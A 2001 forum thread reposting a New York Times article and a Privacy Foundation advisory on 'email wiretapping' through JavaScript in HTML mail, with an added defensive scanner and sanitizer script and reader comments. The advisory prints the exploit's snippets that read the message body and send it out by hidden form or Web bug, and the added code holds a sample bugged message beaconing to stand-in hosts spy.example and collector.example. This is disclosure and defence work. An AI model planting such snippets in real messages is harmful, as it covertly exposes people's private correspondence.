NY TIMES ............. SNOOPS VIA YOUR EMAIL.

greenspun.com : LUSENET : Poole's Roost II : One Thread

http://www.nytimes.com/2001/02/05/technology/05JAVA.html?printpage=yes
February 5, 2001

A New Trick Gives Snoops Easy Access to E-Mail

By AMY HARMON

For those still harboring the illusion that e-mail exchanges are private, a watchdog group has uncovered a new trick that enables someone to essentially bug an e-mail message so that the spy would be privy to any comments that a recipient might add as the message is forwarded to others or sent back and forth.

The maneuver does not take advantage of any security flaw in e-mail software. It is simply one feature of a fancier and increasingly common form of e-mail known as HTML mail, which enables users to send and receive e-mail messages that look and act like a Web page.

With the spying technique, a few lines of a programming language called JavaScript, often used on Web sites to create pop-up windows and navigational aids, can be embedded in such a message. This implant, not visible to the recipient, enables the text to be secretly returned to its original sender every time it is forwarded to another recipient, as long as the recipients' e-mail programs are set up to read JavaScript.

Although HTML e-mail often includes images and animations, it can also be made to look like a plain text e-mail. To figure out whether a message is HTML or text, a user can right-click on the message body. If one of the menu choices that appears is "view source," it is HTML mail. By choosing "view source," a user would be able to see any JavaScript code embedded in the message. But whether the code was designed to bug a message would likely still be difficult to recognize for someone unfamiliar with the computer language.

"I looked at this and I said, `Whoa,' because it lets you spy on people, and it's so easy," said Richard M. Smith, chief technology officer for the Privacy Foundation, an educational and research organization based in Denver that plans to publicize and demonstrate the technique today.

"Most of us won't release a computer virus, but this is something people would use, particularly if a service started offering it," Mr. Smith said. "It's just kind of human nature."

Invisible tags sometimes called Web bugs are widely used in HTML e-mail by marketers and others to detect whether an individual has opened an e-mail message. The Congressional Privacy Caucus has announced plans to hold hearings to investigate the use of Web bugs later this month. Mr. Smith said that it was now clear that JavaScript could be used to create a more powerful Web bug so that not only can someone find out when a message is read, but also what is being said about it.

Because many e-mail users continue to hit "reply" during long e-mail exchanges rather than initiating new messages, the JavaScript code could enable an individual to eavesdrop on an entire conversation between business associates about a proposal he or she had e-mailed to one of them, for example. It could also be used to harvest e-mail addresses when a message like a joke was forwarded over and over to groups of people across the Internet.

The widely used e-mail programs that are vulnerable to the exploit include Microsoft Outlook, Outlook Express and Netscape Messenger 6. America Online users and users of Web-based e-mail programs like Hotmail would not be affected.

By going to the "preferences" command under the edit menu in Netscape Messenger, users can turn off JavaScript in about five steps. To disable JavaScript in Microsoft Outlook and Outlook Express takes about 15 steps, which are outlined on the privacy foundation Web site at www.privacyfoundation.org. The newest version of Outlook Express comes with JavaScript turned off, as a result of customer feedback, a Microsoft spokesman said.

"At this point in time, it's really a personal choice everybody has to make whether they are more concerned about a security risk or about the advanced functionality you get by having these features enabled," said Lisa Gurrey, product manager for Microsoft Office. "We are just doing the best we can to give our customers different options."

But turning off JavaScript does not necessarily mean that e-mail cannot be spied on, because a bugged message will still be returned to its original sender if it is replied to or forwarded to someone who reads the message with an e-mail program that is vulnerable.

Today, the Privacy Foundation plans to provide public demonstrations of the process, which the group calls "e-mail wiretapping" and believes to be illegal. The group is calling for the major vendors of e-mail programs to provide their software with JavaScript automatically turned off. The potential for such e-mail spying was first discovered by Carl Voth, an engineer in British Columbia, who brought it to the attention of Mr. Smith at the Privacy Foundation.

"What bothers me is that in this case, my vulnerability is a function of what you do," Mr. Voth said. "I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable."



-- Anonymous, February 05, 2001

Answers

MORE

http://www.privacyfoundation.org/advisories/advemailwiretap.html#users

Advisory on Email
Email Wiretapping
Richard M. Smith, Chief Technology Officer, Privacy Foundation
2/05/01


Introduction
Vendor Responses
Recommendations for Users
Recommendations for Vendors of Email Readers
How Email Wiretapping Works
Related Links


Introduction

The Privacy Foundation has recently learned of an exploit that allows the sender of an email message to see what has been written when the message is forwarded with comments to other recipients. We have nicknamed this problem "email wiretapping" because the exploit allows someone to surreptitiously monitor written messages attached to forwarded messages.

Some of the possible ways that this exploit might be used include:

Monitoring the path of a confidential email message and written comments attached.

In a business negotiation conducted via email, one side can learn inside information from the other side as the proposal is discussed through the recipient company's internal email system.

A bugged email message could capture thousands of email addresses as the forwarded message is sent around the world.

Commercial entities, particularly those based offshore, may seek to offer email wiretapping as a service.

The exploit requires the person reading a wiretapped email message to be using an HTML-enabled email reader that also has JavaScript turned on by default. Affected email readers include Outlook, Outlook Express, and Netscape 6 Mail. Earlier versions of Netscape are not affected because they do not support all the features of the JavaScript Document Object Model (DOM). Also Eudora and the AOL 6.0 email readers are not affected because JavaScript is turned off by default. Hotmail and other Web-based email systems automatically remove JavaScript programs from incoming email messages and therefore are not vulnerable.

The exploit is made possible because JavaScript is able to read text in an email message. If a message is forwarded to someone else, the hidden JavaScript code in the page can read any text that has been added to the message when it is forwarded. This JavaScript code executes when the forwarded message is read. The JavaScript code then silently sends off this text using a Web bug, or a hidden form, to a Web server belonging to the original sender of the message. The sender can then retrieve the text and read it.

This exploit does not make any use of any programming errors in an email reader or JavaScript. Rather it uses standard documented features of JavaScript.

A wiretapped email message is difficult to detect. An individual can avoid the email wiretap by turning off JavaScript in the email reader. However, if the individual forwards the message to someone who has JavaScript turned on, that recipient's forwarded messages can still be wiretapped. In addition, copying the original message into a new email, rather than forwarding it, may not defeat the exploit.

The Privacy Foundation would like to thank Carl Voth for bringing this issue to our attention. See the Related Links section below for Carl's original 1998 write-up regarding what he termed the "Reaper Exploit."


Vendor Responses

Both Carl Voth and the Privacy Foundation have notified Microsoft of the exploit in Outlook and Outlook Express. The Foundation has also made Netscape aware of the issue. Both companies confirmed that the problem exists and recommend that users who are concerned about it turn off JavaScript in HTML email messages.


Recommendations for Users

It is possible to partially eliminate the email wiretapping problem by turning off JavaScript in HTML email messages. Here are instructions for various email readers vulnerable to the problem:

Outlook 2000
Outlook Express 5
Netscape Messenger 6

Turning off JavaScript is only a partial solution because a wiretapped message will still work if it is replied to, or forwarded, to someone whose email program is vulnerable to the exploit.

Another approach for Outlook users is to download and install the Outlook email security patch, available at:

http://office.microsoft.com/2000/downloaddetails/Out2ksec.htm
This patch disables JavaScript in email and provides protection against computer viruses transmitted as attached files. This patch was created by Microsoft after the ILOVEYOU virus last year. Because the patch removes some functionality from Outlook, it is a good idea to carefully read over the patch description before installing it.

Please note that turning off JavaScript in email still leaves JavaScript enabled in a Web browser. Because JavaScript is used extensively at Web sites, the Privacy Foundation does not recommend turning off JavaScript in a Web browser.


Recommendations for Vendors of Email Readers

Because of the email wiretapping problem and other security holes, the Privacy Foundation strongly recommends that all email readers that support HTML-enabled messages should have JavaScript turned off by default. We do not believe that users should have to reconfigure computer settings to assure the security of their email. JavaScript is rarely used in email today and seems of little utility.

Another possible solution is to have an email reader automatically remove any embedded scripts in an HTML email message when the message is re-sent.


How Email Wiretapping Works

The email wiretapping exploit requires HTML email messages to work. An HTML email message uses the HTML formatting language of Web pages to provide email messages with graphics and text formatting features such as bold, italics, and different-sized fonts. HTML email messages look like Web pages on the screen and are much more flexible than plain text messages. Most of the popular email readers for desktop systems support HTML email messages. These readers include Eudora, Netscape Messenger, Outlook, and Outlook Express.

Just like Web pages, HTML email messages can contain small JavaScript programs embedded in them. JavaScript code is extremely popular on Web pages. Typical uses include validation of form information and navigational aids for a Web site. To date, however, the use of JavaScript in email messages has been minimal because there does not seem much call for it.

The email wiretapping exploit uses a small JavaScript program to work. The exploit is not based on program bugs in JavaScript but instead uses standard JavaScript features that are well documented in almost all books that teach JavaScript programming.

The actual JavaScript code can be embedded in an HTML message using an HTML <script> tag. Alternatively the script code can be loaded from an external JavaScript file using an HTML <script src=> tag. This external file is downloaded from a remote Web server when a wiretapped message is read.

The exploit has two pieces to it. The first piece reads the entire content of a message into a JavaScript variable. The second piece sends off the content of the email message to a remote Web server.

The first piece of the exploit is trivial in nature and can be written with a single line of JavaScript code. This line of code uses JavaScript's Document Object Model (DOM) to read the contents of the message into a variable. Here's what this line of code looks like:

contents = document.body.innerHTML; // the rendered message, including any text added when it was forwarded or replied to

The second piece of the exploit is used to send back the message to a remote Web site. There are two different approaches for doing this. With the first approach, JavaScript places the contents of the message into a hidden form on the message and then submits the form to a remote server.

The JavaScript code for doing this submit would look something like this:

document.hiddenForm.message.value = contents; // copy the message into a hidden form field
document.hiddenForm.submit();                  // submit the form to the action URL on the wiretapper's server

The hidden-form method can be detected by a user, if the user has configured their Web browser to warn them any time information is submitted as a form to a Web site.

The content of the message can also be sent off using a Web bug. Unlike the hidden-form method, the Web bug method is not easily detectable. A Web bug is simply an invisible image used to transmit information from a browser back to a Web server. The content of an email message can be sent back in the query string of the URL of the Web bug image.

Here is what the Web bug code might look like:

webBug = new Image();                                   // never added to the page, so nothing is displayed
webBug.src = baseURL + "?message=" + escape(contents);  // setting src fetches the URL, carrying the message in the query string

To actually make the email wiretapping code work reliably in all the different email readers requires more work to program around various technical issues and quirks in the email readers. The resulting script takes about 30 lines of code. The Privacy Center at the University of Denver has built and tested a more robust script for wiretapping, but will not be releasing it. However, a programmer with a good working knowledge of JavaScript could create a similar script in one to two days.

After the JavaScript wiretap is written, the wiretapper also has to arrange a way to turn the messages produced by the wiretap into an ordinary readable form. This "back end" can be constructed by an experienced CGI programmer in a day or two.

To launch a "bugged" message is actually very simple. Here are the steps:

The email wiretapping script is put on a blank Web page.
The blank Web page is viewed in the Web browser.
The "Send page" command is selected in the Web browser and an email reader starts up.
The message text is entered at the top of the page in the email program.
The message is then sent off.

Some email readers like Outlook Express also allow script code to be copied and pasted into an HTML email message directly while the message is being edited.

The email wiretapping script is then executed each and every time the message is read by someone using a vulnerable reader. If they then forward the message or reply to the message, the new messages are also "bugged" because the script is copied from the original message to the new message.

If a wiretapped message were discovered, it would be possible to determine where the script code was sending the text. By viewing the source code of the message and reading through the JavaScript code, it would be possible to see the Web server where the message text was sent. Even if the author of the code attempted to hide the destination, adding debug code to the script could be used to discover the destination. However the destination could be to a Web service company and not a Web server belonging to the person doing the wiretapping.




-- Anonymous, February 05, 2001
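The two defensive measures the advisory describes, working out where a bugged message reports to (the "How Email Wiretapping Works" section) and stripping embedded scripts before a message is re-sent (the vendor recommendation), as an added example in JavaScript for Node.js. This is not the Privacy Foundation's wiretap script and not code from any mail client. The bugged sample message, the hosts spy.example and collector.example, and the paths in it are constructed for the demonstration.

```javascript
"use strict";

// Added example, not the Privacy Foundation's script and not any mail
// client's code: scan an HTML e-mail for the script content a wiretapped
// message depends on, report the hosts it would send data to, and strip
// active content so the message can be forwarded inert.
//
// The scanner uses regular expressions over the raw HTML. That is adequate
// for a demonstration; a real mail client must tokenize the HTML properly
// and apply an allowlist of tags and attributes, because regexes can be
// evaded with malformed markup.

// Constructed sample of a "bugged" message of the kind the advisory
// describes. Hostnames spy.example / collector.example and the paths are
// assumptions, not real infrastructure.
const BUGGED_MESSAGE = `<html><body>
<p>Hi Bob, please review the proposal below and forward it to legal.</p>
<form name="hiddenForm" method="post" action="http://collector.example/cgi-bin/post"
      style="display:none"><input type="hidden" name="message" value=""></form>
<script type="text/javascript">
  var contents = document.body.innerHTML;
  var baseURL = "http://spy.example/bug.gif";
  var webBug = new Image();
  webBug.src = baseURL + "?message=" + escape(contents);
</script>
<script src="http://spy.example/wiretap.js"></script>
<img src="http://spy.example/open.gif?id=12345" width="1" height="1">
<p onmouseover="document.hiddenForm.submit()">Regards, Alice</p>
</body></html>`;

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
const URL_IN_TEXT_RE = /https?:\/\/[^\s"'<>)]+/g;
const EVENT_ATTR_RE = /\s+on[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi;
const JS_URL_RE = /\s+(?:href|src|action)\s*=\s*(?:"\s*javascript:[^"]*"|'\s*javascript:[^']*'|javascript:[^\s>]*)/gi;
const attrRe = (name) =>
  new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, "i");

// Value of one attribute from a tag's attribute string, or null if absent.
function attrValue(tagAttrs, name) {
  const m = attrRe(name).exec(tagAttrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function hostOf(url) {
  try { return new URL(url).host; } catch { return null; }
}

// Inventory of script elements, the hosts that scripts or form actions point
// at (where a wiretap would deliver the text), and 1x1 images of the kind
// used as read-receipt Web bugs.
function analyzeHtmlMail(html) {
  const scripts = [];
  const hosts = new Set();
  for (const m of html.matchAll(SCRIPT_RE)) {
    const src = attrValue(m[1], "src");
    scripts.push({ src, code: m[2].trim() });
    if (src) hosts.add(hostOf(src));
    for (const u of m[2].match(URL_IN_TEXT_RE) || []) hosts.add(hostOf(u));
  }
  for (const m of html.matchAll(/<form\b([^>]*)>/gi)) {
    const action = attrValue(m[1], "action");
    if (action) hosts.add(hostOf(action));
  }
  const trackingPixels = [];
  for (const m of html.matchAll(/<img\b([^>]*)>/gi)) {
    if (attrValue(m[1], "width") === "1" && attrValue(m[1], "height") === "1") {
      trackingPixels.push(attrValue(m[1], "src"));
    }
  }
  hosts.delete(null);
  return { scripts, destinations: [...hosts].sort(), trackingPixels };
}

// Remove everything that could execute when the message is displayed or
// re-sent: script elements, event-handler attributes and javascript: URLs.
function stripActiveContent(html) {
  return html
    .replace(SCRIPT_RE, "")               // well-formed <script>...</script>
    .replace(/<\/?script\b[^>]*>/gi, "")  // stray or unclosed script tags; their body is left as inert text
    .replace(EVENT_ATTR_RE, "")           // onload=, onmouseover=, ...
    .replace(JS_URL_RE, "");              // href="javascript:...", action="javascript:..."
}

if (typeof require !== "undefined" && require.main === module) {
  const report = analyzeHtmlMail(BUGGED_MESSAGE);
  console.log("scripts:", report.scripts.length, "destinations:", report.destinations);
  console.log("tracking pixels:", report.trackingPixels);
  console.log(stripActiveContent(BUGGED_MESSAGE));
}
```

Run it with node and the report names both spy.example (from the inline script and the external script src) and collector.example (from the hidden form's action), which is the kind of answer a reader would otherwise have to dig out of "view source". The sanitized copy keeps the message text and even the hidden form, which is inert once no script can submit it; a stricter client would drop forms and remote images as well. Note the limit the advisory itself states: stripping on the recipient's side protects that hop only, and copies already sitting in other readers' inboxes with JavaScript enabled remain bugged.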




Thanks but I already read this earlier when I read your email Charlie :)

http://www.cnn.com/TECH/computing/9908/30/hotmail.02/

-- Anonymous, February 05, 2001


NOT the same thing at all. The hotmail hole was a specific thing. This new pain is GENERIC and hardly clever.

The only stop is for people to send ASCII/TEXT and stop with all the fancy emails or use ONLY very secure web mail sites where you have them trying to defend also.

-- Anonymous, February 05, 2001


Interesting info Charlie. I also found it amusing that Microsoft, whose every product is full of holes and whose websites have been hacked so much it isn't even funny, is working with several other companies to develop a secure Internet "voting" system. Oh, yeah, THAT should really be secure.....

-- Anonymous, February 05, 2001


I've never understood why folks wanted their E-mail to include HTML in the first place. Then again, I suppose there are people who present and receive FAR more interesting mail than I.

I'm not at all concerned about who snoops on my E-mail. [Wasn't this already discussed a while back?] My inbox and outbox share one common theme: zzzzzzzzzz.

I'd really be more interested in why *I*'m getting spam asking if I'm horny and point me to sites that display females, or the spam that tells me about Viagra or how to cure baldness. My "block" list is already so long these days that I don't even bother to include more. I can tell by the subject line that I'm not interested and simply click on delete.

-- Anonymous, February 06, 2001


I don't think I've EVER sent an HTML email, but I do receive them sometimes - so it's nice to be able to view it with peace of mind ...

I use the oldie but goodie, Pegasus Mail!

Pegasus does not implement the HTTP protocol and its HTML viewer will not attempt to include any content referenced by hyperlinks in the message. It will display the HTML present in the message itself but not activate scripts. So there will be no chance for any remote server to place and manipulate any cookie.

Also I just plain like it. :-)

-- Anonymous, February 14, 2001

